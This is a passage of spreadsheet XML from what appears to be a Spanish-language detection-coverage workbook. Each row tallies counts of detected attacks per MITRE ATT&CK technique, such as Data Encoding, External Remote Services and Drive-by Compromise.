      <c r="P28" s="12">
        <v>0</v>
      </c>
      <c r="Q28" s="13">
        <v>0</v>
      </c>
      <c r="R28" s="394">
        <v>0</v>
      </c>
      <c r="S28" s="409">
        <v>0</v>
      </c>
      <c r="T28" s="4">
        <v>0</v>
      </c>
      <c r="U28" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V28" s="4">
        <v>0</v>
      </c>
      <c r="W28" s="13">
        <v>0</v>
      </c>
      <c r="X28" s="394">
        <v>0</v>
      </c>
      <c r="Y28" s="392">
        <v>9</v>
      </c>
      <c r="Z28" s="392">
        <v>9</v>
      </c>
      <c r="AA28" s="322" t="str">
        <f t="shared" si="3"/>
        <v>9 (9)</v>
      </c>
      <c r="AB28" s="392">
        <v>4</v>
      </c>
      <c r="AC28" s="16">
        <v>1</v>
      </c>
      <c r="AD28" s="394">
        <v>9</v>
      </c>
      <c r="AE28" s="392">
        <v>0</v>
      </c>
      <c r="AF28" s="392">
        <v>0</v>
      </c>
      <c r="AG28" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH28" s="392">
        <v>0</v>
      </c>
      <c r="AI28" s="16">
        <v>0</v>
      </c>
      <c r="AJ28" s="394">
        <v>0</v>
      </c>
      <c r="AK28" s="392">
        <v>9</v>
      </c>
      <c r="AL28" s="392">
        <v>9</v>
      </c>
      <c r="AM28" s="322" t="str">
        <f t="shared" si="5"/>
        <v>9 (9)</v>
      </c>
      <c r="AN28" s="392">
        <v>4</v>
      </c>
      <c r="AO28" s="16">
        <v>1</v>
      </c>
      <c r="AP28" s="394">
        <v>9</v>
      </c>
      <c r="AQ28" s="292">
        <v>0</v>
      </c>
      <c r="AR28" s="322">
        <v>0</v>
      </c>
      <c r="AS28" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT28" s="12">
        <v>0</v>
      </c>
      <c r="AU28" s="13">
        <v>0</v>
      </c>
      <c r="AV28" s="394">
        <v>0</v>
      </c>
      <c r="AW28" s="392">
        <v>0</v>
      </c>
      <c r="AX28" s="392">
        <v>0</v>
      </c>
      <c r="AY28" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ28" s="4">
        <v>0</v>
      </c>
      <c r="BA28" s="16">
        <v>0</v>
      </c>
      <c r="BB28" s="394">
        <v>0</v>
      </c>
      <c r="BC28" s="292">
        <v>0</v>
      </c>
      <c r="BD28" s="322">
        <v>0</v>
      </c>
      <c r="BE28" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF28" s="12">
        <v>0</v>
      </c>
      <c r="BG28" s="13">
        <v>0</v>
      </c>
      <c r="BH28" s="394">
        <v>0</v>
      </c>
      <c r="BI28" s="292">
        <v>0</v>
      </c>
      <c r="BJ28" s="322">
        <v>0</v>
      </c>
      <c r="BK28" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL28" s="12">
        <v>0</v>
      </c>
      <c r="BM28" s="13">
        <v>0</v>
      </c>
      <c r="BN28" s="394">
        <v>0</v>
      </c>
      <c r="BO28" s="292">
        <v>3</v>
      </c>
      <c r="BP28" s="322">
        <v>3</v>
      </c>
      <c r="BQ28" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (3)</v>
      </c>
      <c r="BR28" s="12">
        <v>0</v>
      </c>
      <c r="BS28" s="12">
        <v>3</v>
      </c>
      <c r="BT28" s="13">
        <v>1</v>
      </c>
      <c r="BU28" s="394">
        <v>2</v>
      </c>
      <c r="BV28" s="292">
        <v>0</v>
      </c>
      <c r="BW28" s="322">
        <v>0</v>
      </c>
      <c r="BX28" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY28" s="12">
        <v>0</v>
      </c>
      <c r="BZ28" s="13">
        <v>0</v>
      </c>
      <c r="CA28" s="394">
        <v>0</v>
      </c>
      <c r="CB28" s="292">
        <v>2</v>
      </c>
      <c r="CC28" s="322">
        <v>2</v>
      </c>
      <c r="CD28" s="322" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE28" s="12">
        <v>0</v>
      </c>
      <c r="CF28" s="12">
        <v>1</v>
      </c>
      <c r="CG28" s="13">
        <v>1</v>
      </c>
      <c r="CH28" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="29" spans="1:86" ht="15" customHeight="1">
      <c r="A29" s="4">
        <f t="shared" si="13"/>
        <v>27</v>
      </c>
      <c r="B29" s="4" t="str">
        <f>IFERROR(VLOOKUP(A29,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1132</v>
      </c>
      <c r="C29" s="493" t="str">
        <f>IFERROR(VLOOKUP(B29,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Encoding</v>
      </c>
      <c r="D29" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B29)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E29" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F29" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (10)</v>
      </c>
      <c r="G29" s="292">
        <v>0</v>
      </c>
      <c r="H29" s="322">
        <v>0</v>
      </c>
      <c r="I29" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J29" s="12">
        <v>0</v>
      </c>
      <c r="K29" s="13">
        <v>0</v>
      </c>
      <c r="L29" s="394">
        <v>0</v>
      </c>
      <c r="M29" s="322">
        <v>1</v>
      </c>
      <c r="N29" s="322">
        <v>1</v>
      </c>
      <c r="O29" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P29" s="12">
        <v>1</v>
      </c>
      <c r="Q29" s="13">
        <v>1</v>
      </c>
      <c r="R29" s="394">
        <v>1</v>
      </c>
      <c r="S29" s="409">
        <v>1</v>
      </c>
      <c r="T29" s="4">
        <v>1</v>
      </c>
      <c r="U29" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V29" s="4">
        <v>1</v>
      </c>
      <c r="W29" s="13">
        <v>1</v>
      </c>
      <c r="X29" s="394">
        <v>1</v>
      </c>
      <c r="Y29" s="392">
        <v>5</v>
      </c>
      <c r="Z29" s="392">
        <v>5</v>
      </c>
      <c r="AA29" s="322" t="str">
        <f t="shared" si="3"/>
        <v>5 (5)</v>
      </c>
      <c r="AB29" s="392">
        <v>1</v>
      </c>
      <c r="AC29" s="16">
        <v>1</v>
      </c>
      <c r="AD29" s="394">
        <v>5</v>
      </c>
      <c r="AE29" s="392">
        <v>1</v>
      </c>
      <c r="AF29" s="392">
        <v>1</v>
      </c>
      <c r="AG29" s="322" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="AH29" s="392">
        <v>1</v>
      </c>
      <c r="AI29" s="16">
        <v>1</v>
      </c>
      <c r="AJ29" s="394">
        <v>1</v>
      </c>
      <c r="AK29" s="392">
        <v>6</v>
      </c>
      <c r="AL29" s="392">
        <v>6</v>
      </c>
      <c r="AM29" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (6)</v>
      </c>
      <c r="AN29" s="392">
        <v>2</v>
      </c>
      <c r="AO29" s="16">
        <v>1</v>
      </c>
      <c r="AP29" s="394">
        <v>6</v>
      </c>
      <c r="AQ29" s="292">
        <v>0</v>
      </c>
      <c r="AR29" s="322">
        <v>0</v>
      </c>
      <c r="AS29" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT29" s="12">
        <v>0</v>
      </c>
      <c r="AU29" s="13">
        <v>0</v>
      </c>
      <c r="AV29" s="394">
        <v>0</v>
      </c>
      <c r="AW29" s="392">
        <v>0</v>
      </c>
      <c r="AX29" s="392">
        <v>0</v>
      </c>
      <c r="AY29" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ29" s="4">
        <v>0</v>
      </c>
      <c r="BA29" s="16">
        <v>0</v>
      </c>
      <c r="BB29" s="394">
        <v>0</v>
      </c>
      <c r="BC29" s="292">
        <v>1</v>
      </c>
      <c r="BD29" s="322">
        <v>1</v>
      </c>
      <c r="BE29" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
      <c r="BF29" s="12">
        <v>1</v>
      </c>
      <c r="BG29" s="13">
        <v>1</v>
      </c>
      <c r="BH29" s="394">
        <v>1</v>
      </c>
      <c r="BI29" s="292">
        <v>2</v>
      </c>
      <c r="BJ29" s="322">
        <v>2</v>
      </c>
      <c r="BK29" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (2)</v>
      </c>
      <c r="BL29" s="12">
        <v>2</v>
      </c>
      <c r="BM29" s="13">
        <v>1</v>
      </c>
      <c r="BN29" s="394">
        <v>1</v>
      </c>
      <c r="BO29" s="292">
        <v>5</v>
      </c>
      <c r="BP29" s="322">
        <v>5</v>
      </c>
      <c r="BQ29" s="322" t="str">
        <f t="shared" si="10"/>
        <v>5 (5)</v>
      </c>
      <c r="BR29" s="12">
        <v>2</v>
      </c>
      <c r="BS29" s="12">
        <v>2</v>
      </c>
      <c r="BT29" s="13">
        <v>1</v>
      </c>
      <c r="BU29" s="394">
        <v>4</v>
      </c>
      <c r="BV29" s="292">
        <v>0</v>
      </c>
      <c r="BW29" s="322">
        <v>0</v>
      </c>
      <c r="BX29" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY29" s="12">
        <v>0</v>
      </c>
      <c r="BZ29" s="13">
        <v>0</v>
      </c>
      <c r="CA29" s="394">
        <v>0</v>
      </c>
      <c r="CB29" s="292">
        <v>5</v>
      </c>
      <c r="CC29" s="322">
        <v>5</v>
      </c>
      <c r="CD29" s="322" t="str">
        <f t="shared" si="12"/>
        <v>5 (5)</v>
      </c>
      <c r="CE29" s="12">
        <v>0</v>
      </c>
      <c r="CF29" s="12">
        <v>1</v>
      </c>
      <c r="CG29" s="13">
        <v>1</v>
      </c>
      <c r="CH29" s="394">
        <v>5</v>
      </c>
    </row>
    <row r="30" spans="1:86" ht="15" customHeight="1">
      <c r="A30" s="4">
        <f t="shared" si="13"/>
        <v>28</v>
      </c>
      <c r="B30" s="4" t="str">
        <f>IFERROR(VLOOKUP(A30,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1133</v>
      </c>
      <c r="C30" s="493" t="str">
        <f>IFERROR(VLOOKUP(B30,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>External Remote Services</v>
      </c>
      <c r="D30" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B30)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E30" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>32</v>
      </c>
      <c r="F30" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (32)</v>
      </c>
      <c r="G30" s="292">
        <v>0</v>
      </c>
      <c r="H30" s="322">
        <v>0</v>
      </c>
      <c r="I30" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J30" s="12">
        <v>0</v>
      </c>
      <c r="K30" s="13">
        <v>0</v>
      </c>
      <c r="L30" s="394">
        <v>0</v>
      </c>
      <c r="M30" s="322">
        <v>0</v>
      </c>
      <c r="N30" s="322">
        <v>0</v>
      </c>
      <c r="O30" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P30" s="12">
        <v>0</v>
      </c>
      <c r="Q30" s="13">
        <v>0</v>
      </c>
      <c r="R30" s="394">
        <v>0</v>
      </c>
      <c r="S30" s="409">
        <v>0</v>
      </c>
      <c r="T30" s="4">
        <v>0</v>
      </c>
      <c r="U30" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V30" s="4">
        <v>0</v>
      </c>
      <c r="W30" s="13">
        <v>0</v>
      </c>
      <c r="X30" s="394">
        <v>0</v>
      </c>
      <c r="Y30" s="392">
        <v>0</v>
      </c>
      <c r="Z30" s="392">
        <v>0</v>
      </c>
      <c r="AA30" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB30" s="392">
        <v>0</v>
      </c>
      <c r="AC30" s="16">
        <v>0</v>
      </c>
      <c r="AD30" s="394">
        <v>0</v>
      </c>
      <c r="AE30" s="392">
        <v>0</v>
      </c>
      <c r="AF30" s="392">
        <v>0</v>
      </c>
      <c r="AG30" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH30" s="392">
        <v>0</v>
      </c>
      <c r="AI30" s="16">
        <v>0</v>
      </c>
      <c r="AJ30" s="394">
        <v>0</v>
      </c>
      <c r="AK30" s="392">
        <v>0</v>
      </c>
      <c r="AL30" s="392">
        <v>0</v>
      </c>
      <c r="AM30" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="AN30" s="392">
        <v>0</v>
      </c>
      <c r="AO30" s="16">
        <v>0</v>
      </c>
      <c r="AP30" s="394">
        <v>0</v>
      </c>
      <c r="AQ30" s="292">
        <v>0</v>
      </c>
      <c r="AR30" s="322">
        <v>0</v>
      </c>
      <c r="AS30" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT30" s="12">
        <v>0</v>
      </c>
      <c r="AU30" s="13">
        <v>0</v>
      </c>
      <c r="AV30" s="394">
        <v>0</v>
      </c>
      <c r="AW30" s="392">
        <v>0</v>
      </c>
      <c r="AX30" s="392">
        <v>0</v>
      </c>
      <c r="AY30" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ30" s="4">
        <v>0</v>
      </c>
      <c r="BA30" s="16">
        <v>0</v>
      </c>
      <c r="BB30" s="394">
        <v>0</v>
      </c>
      <c r="BC30" s="292">
        <v>0</v>
      </c>
      <c r="BD30" s="322">
        <v>0</v>
      </c>
      <c r="BE30" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF30" s="12">
        <v>0</v>
      </c>
      <c r="BG30" s="13">
        <v>0</v>
      </c>
      <c r="BH30" s="394">
        <v>0</v>
      </c>
      <c r="BI30" s="292">
        <v>0</v>
      </c>
      <c r="BJ30" s="322">
        <v>0</v>
      </c>
      <c r="BK30" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL30" s="12">
        <v>0</v>
      </c>
      <c r="BM30" s="13">
        <v>0</v>
      </c>
      <c r="BN30" s="394">
        <v>0</v>
      </c>
      <c r="BO30" s="292">
        <v>32</v>
      </c>
      <c r="BP30" s="322">
        <v>30</v>
      </c>
      <c r="BQ30" s="322" t="str">
        <f t="shared" si="10"/>
        <v>30 (32)</v>
      </c>
      <c r="BR30" s="12">
        <v>0</v>
      </c>
      <c r="BS30" s="12">
        <v>7</v>
      </c>
      <c r="BT30" s="13">
        <v>1</v>
      </c>
      <c r="BU30" s="394">
        <v>30</v>
      </c>
      <c r="BV30" s="292">
        <v>0</v>
      </c>
      <c r="BW30" s="322">
        <v>0</v>
      </c>
      <c r="BX30" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY30" s="12">
        <v>0</v>
      </c>
      <c r="BZ30" s="13">
        <v>0</v>
      </c>
      <c r="CA30" s="394">
        <v>0</v>
      </c>
      <c r="CB30" s="292">
        <v>0</v>
      </c>
      <c r="CC30" s="322">
        <v>0</v>
      </c>
      <c r="CD30" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE30" s="12">
        <v>0</v>
      </c>
      <c r="CF30" s="12">
        <v>0</v>
      </c>
      <c r="CG30" s="13">
        <v>0</v>
      </c>
      <c r="CH30" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:86" ht="15" customHeight="1">
      <c r="A31" s="4">
        <f t="shared" si="13"/>
        <v>29</v>
      </c>
      <c r="B31" s="4" t="str">
        <f>IFERROR(VLOOKUP(A31,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1176</v>
      </c>
      <c r="C31" s="493" t="str">
        <f>IFERROR(VLOOKUP(B31,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Software Extensions</v>
      </c>
      <c r="D31" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B31)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E31" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>217</v>
      </c>
      <c r="F31" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (217)</v>
      </c>
      <c r="G31" s="292">
        <v>0</v>
      </c>
      <c r="H31" s="322">
        <v>0</v>
      </c>
      <c r="I31" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J31" s="12">
        <v>0</v>
      </c>
      <c r="K31" s="13">
        <v>0</v>
      </c>
      <c r="L31" s="394">
        <v>0</v>
      </c>
      <c r="M31" s="322">
        <v>0</v>
      </c>
      <c r="N31" s="322">
        <v>0</v>
      </c>
      <c r="O31" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P31" s="12">
        <v>0</v>
      </c>
      <c r="Q31" s="13">
        <v>0</v>
      </c>
      <c r="R31" s="394">
        <v>0</v>
      </c>
      <c r="S31" s="409">
        <v>0</v>
      </c>
      <c r="T31" s="4">
        <v>0</v>
      </c>
      <c r="U31" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V31" s="4">
        <v>0</v>
      </c>
      <c r="W31" s="13">
        <v>0</v>
      </c>
      <c r="X31" s="394">
        <v>0</v>
      </c>
      <c r="Y31" s="392">
        <v>212</v>
      </c>
      <c r="Z31" s="392">
        <v>212</v>
      </c>
      <c r="AA31" s="322" t="str">
        <f t="shared" si="3"/>
        <v>212 (212)</v>
      </c>
      <c r="AB31" s="392">
        <v>1</v>
      </c>
      <c r="AC31" s="16">
        <v>1</v>
      </c>
      <c r="AD31" s="394">
        <v>212</v>
      </c>
      <c r="AE31" s="392">
        <v>212</v>
      </c>
      <c r="AF31" s="392">
        <v>212</v>
      </c>
      <c r="AG31" s="322" t="str">
        <f t="shared" si="4"/>
        <v>212 (212)</v>
      </c>
      <c r="AH31" s="392">
        <v>1</v>
      </c>
      <c r="AI31" s="16">
        <v>1</v>
      </c>
      <c r="AJ31" s="394">
        <v>212</v>
      </c>
      <c r="AK31" s="392">
        <v>424</v>
      </c>
      <c r="AL31" s="392">
        <v>424</v>
      </c>
      <c r="AM31" s="322" t="str">
        <f t="shared" si="5"/>
        <v>424 (424)</v>
      </c>
      <c r="AN31" s="392">
        <v>2</v>
      </c>
      <c r="AO31" s="16">
        <v>1</v>
      </c>
      <c r="AP31" s="394">
        <v>212</v>
      </c>
      <c r="AQ31" s="292">
        <v>0</v>
      </c>
      <c r="AR31" s="322">
        <v>0</v>
      </c>
      <c r="AS31" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT31" s="12">
        <v>0</v>
      </c>
      <c r="AU31" s="13">
        <v>0</v>
      </c>
      <c r="AV31" s="394">
        <v>0</v>
      </c>
      <c r="AW31" s="392">
        <v>0</v>
      </c>
      <c r="AX31" s="392">
        <v>0</v>
      </c>
      <c r="AY31" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ31" s="4">
        <v>0</v>
      </c>
      <c r="BA31" s="16">
        <v>0</v>
      </c>
      <c r="BB31" s="394">
        <v>0</v>
      </c>
      <c r="BC31" s="292">
        <v>0</v>
      </c>
      <c r="BD31" s="322">
        <v>0</v>
      </c>
      <c r="BE31" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF31" s="12">
        <v>0</v>
      </c>
      <c r="BG31" s="13">
        <v>0</v>
      </c>
      <c r="BH31" s="394">
        <v>0</v>
      </c>
      <c r="BI31" s="292">
        <v>0</v>
      </c>
      <c r="BJ31" s="322">
        <v>0</v>
      </c>
      <c r="BK31" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL31" s="12">
        <v>0</v>
      </c>
      <c r="BM31" s="13">
        <v>0</v>
      </c>
      <c r="BN31" s="394">
        <v>0</v>
      </c>
      <c r="BO31" s="292">
        <v>217</v>
      </c>
      <c r="BP31" s="322">
        <v>217</v>
      </c>
      <c r="BQ31" s="322" t="str">
        <f t="shared" si="10"/>
        <v>217 (217)</v>
      </c>
      <c r="BR31" s="12">
        <v>0</v>
      </c>
      <c r="BS31" s="12">
        <v>3</v>
      </c>
      <c r="BT31" s="13">
        <v>1</v>
      </c>
      <c r="BU31" s="394">
        <v>217</v>
      </c>
      <c r="BV31" s="292">
        <v>0</v>
      </c>
      <c r="BW31" s="322">
        <v>0</v>
      </c>
      <c r="BX31" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY31" s="12">
        <v>0</v>
      </c>
      <c r="BZ31" s="13">
        <v>0</v>
      </c>
      <c r="CA31" s="394">
        <v>0</v>
      </c>
      <c r="CB31" s="292">
        <v>212</v>
      </c>
      <c r="CC31" s="322">
        <v>212</v>
      </c>
      <c r="CD31" s="322" t="str">
        <f t="shared" si="12"/>
        <v>212 (212)</v>
      </c>
      <c r="CE31" s="12">
        <v>0</v>
      </c>
      <c r="CF31" s="12">
        <v>1</v>
      </c>
      <c r="CG31" s="13">
        <v>1</v>
      </c>
      <c r="CH31" s="394">
        <v>212</v>
      </c>
    </row>
    <row r="32" spans="1:86" ht="15" customHeight="1">
      <c r="A32" s="4">
        <f t="shared" si="13"/>
        <v>30</v>
      </c>
      <c r="B32" s="4" t="str">
        <f>IFERROR(VLOOKUP(A32,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1187</v>
      </c>
      <c r="C32" s="493" t="str">
        <f>IFERROR(VLOOKUP(B32,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Forced Authentication</v>
      </c>
      <c r="D32" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B32)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E32" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>11</v>
      </c>
      <c r="F32" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (11)</v>
      </c>
      <c r="G32" s="292">
        <v>0</v>
      </c>
      <c r="H32" s="322">
        <v>0</v>
      </c>
      <c r="I32" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J32" s="12">
        <v>0</v>
      </c>
      <c r="K32" s="13">
        <v>0</v>
      </c>
      <c r="L32" s="394">
        <v>0</v>
      </c>
      <c r="M32" s="322">
        <v>0</v>
      </c>
      <c r="N32" s="322">
        <v>0</v>
      </c>
      <c r="O32" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P32" s="12">
        <v>0</v>
      </c>
      <c r="Q32" s="13">
        <v>0</v>
      </c>
      <c r="R32" s="394">
        <v>0</v>
      </c>
      <c r="S32" s="409">
        <v>0</v>
      </c>
      <c r="T32" s="4">
        <v>0</v>
      </c>
      <c r="U32" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V32" s="4">
        <v>0</v>
      </c>
      <c r="W32" s="13">
        <v>0</v>
      </c>
      <c r="X32" s="394">
        <v>0</v>
      </c>
      <c r="Y32" s="392">
        <v>15</v>
      </c>
      <c r="Z32" s="392">
        <v>15</v>
      </c>
      <c r="AA32" s="322" t="str">
        <f t="shared" si="3"/>
        <v>15 (15)</v>
      </c>
      <c r="AB32" s="392">
        <v>5</v>
      </c>
      <c r="AC32" s="16">
        <v>1</v>
      </c>
      <c r="AD32" s="394">
        <v>3</v>
      </c>
      <c r="AE32" s="392">
        <v>0</v>
      </c>
      <c r="AF32" s="392">
        <v>0</v>
      </c>
      <c r="AG32" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH32" s="392">
        <v>0</v>
      </c>
      <c r="AI32" s="16">
        <v>0</v>
      </c>
      <c r="AJ32" s="394">
        <v>0</v>
      </c>
      <c r="AK32" s="392">
        <v>15</v>
      </c>
      <c r="AL32" s="392">
        <v>15</v>
      </c>
      <c r="AM32" s="322" t="str">
        <f t="shared" si="5"/>
        <v>15 (15)</v>
      </c>
      <c r="AN32" s="392">
        <v>5</v>
      </c>
      <c r="AO32" s="16">
        <v>1</v>
      </c>
      <c r="AP32" s="394">
        <v>3</v>
      </c>
      <c r="AQ32" s="292">
        <v>0</v>
      </c>
      <c r="AR32" s="322">
        <v>0</v>
      </c>
      <c r="AS32" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT32" s="12">
        <v>0</v>
      </c>
      <c r="AU32" s="13">
        <v>0</v>
      </c>
      <c r="AV32" s="394">
        <v>0</v>
      </c>
      <c r="AW32" s="392">
        <v>0</v>
      </c>
      <c r="AX32" s="392">
        <v>0</v>
      </c>
      <c r="AY32" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ32" s="4">
        <v>0</v>
      </c>
      <c r="BA32" s="16">
        <v>0</v>
      </c>
      <c r="BB32" s="394">
        <v>0</v>
      </c>
      <c r="BC32" s="292">
        <v>0</v>
      </c>
      <c r="BD32" s="322">
        <v>0</v>
      </c>
      <c r="BE32" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF32" s="12">
        <v>0</v>
      </c>
      <c r="BG32" s="13">
        <v>0</v>
      </c>
      <c r="BH32" s="394">
        <v>0</v>
      </c>
      <c r="BI32" s="292">
        <v>7</v>
      </c>
      <c r="BJ32" s="322">
        <v>7</v>
      </c>
      <c r="BK32" s="322" t="str">
        <f t="shared" si="9"/>
        <v>7 (7)</v>
      </c>
      <c r="BL32" s="12">
        <v>1</v>
      </c>
      <c r="BM32" s="13">
        <v>1</v>
      </c>
      <c r="BN32" s="394">
        <v>7</v>
      </c>
      <c r="BO32" s="292">
        <v>25</v>
      </c>
      <c r="BP32" s="322">
        <v>25</v>
      </c>
      <c r="BQ32" s="322" t="str">
        <f t="shared" si="10"/>
        <v>25 (25)</v>
      </c>
      <c r="BR32" s="12">
        <v>1</v>
      </c>
      <c r="BS32" s="12">
        <v>3</v>
      </c>
      <c r="BT32" s="13">
        <v>1</v>
      </c>
      <c r="BU32" s="394">
        <v>10</v>
      </c>
      <c r="BV32" s="292">
        <v>0</v>
      </c>
      <c r="BW32" s="322">
        <v>0</v>
      </c>
      <c r="BX32" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY32" s="12">
        <v>0</v>
      </c>
      <c r="BZ32" s="13">
        <v>0</v>
      </c>
      <c r="CA32" s="394">
        <v>0</v>
      </c>
      <c r="CB32" s="292">
        <v>0</v>
      </c>
      <c r="CC32" s="322">
        <v>0</v>
      </c>
      <c r="CD32" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE32" s="12">
        <v>0</v>
      </c>
      <c r="CF32" s="12">
        <v>0</v>
      </c>
      <c r="CG32" s="13">
        <v>0</v>
      </c>
      <c r="CH32" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:86" ht="15" customHeight="1">
      <c r="A33" s="4">
        <f t="shared" si="13"/>
        <v>31</v>
      </c>
      <c r="B33" s="4" t="str">
        <f>IFERROR(VLOOKUP(A33,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1189</v>
      </c>
      <c r="C33" s="493" t="str">
        <f>IFERROR(VLOOKUP(B33,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Drive-by Compromise</v>
      </c>
      <c r="D33" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B33)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E33" s="493">
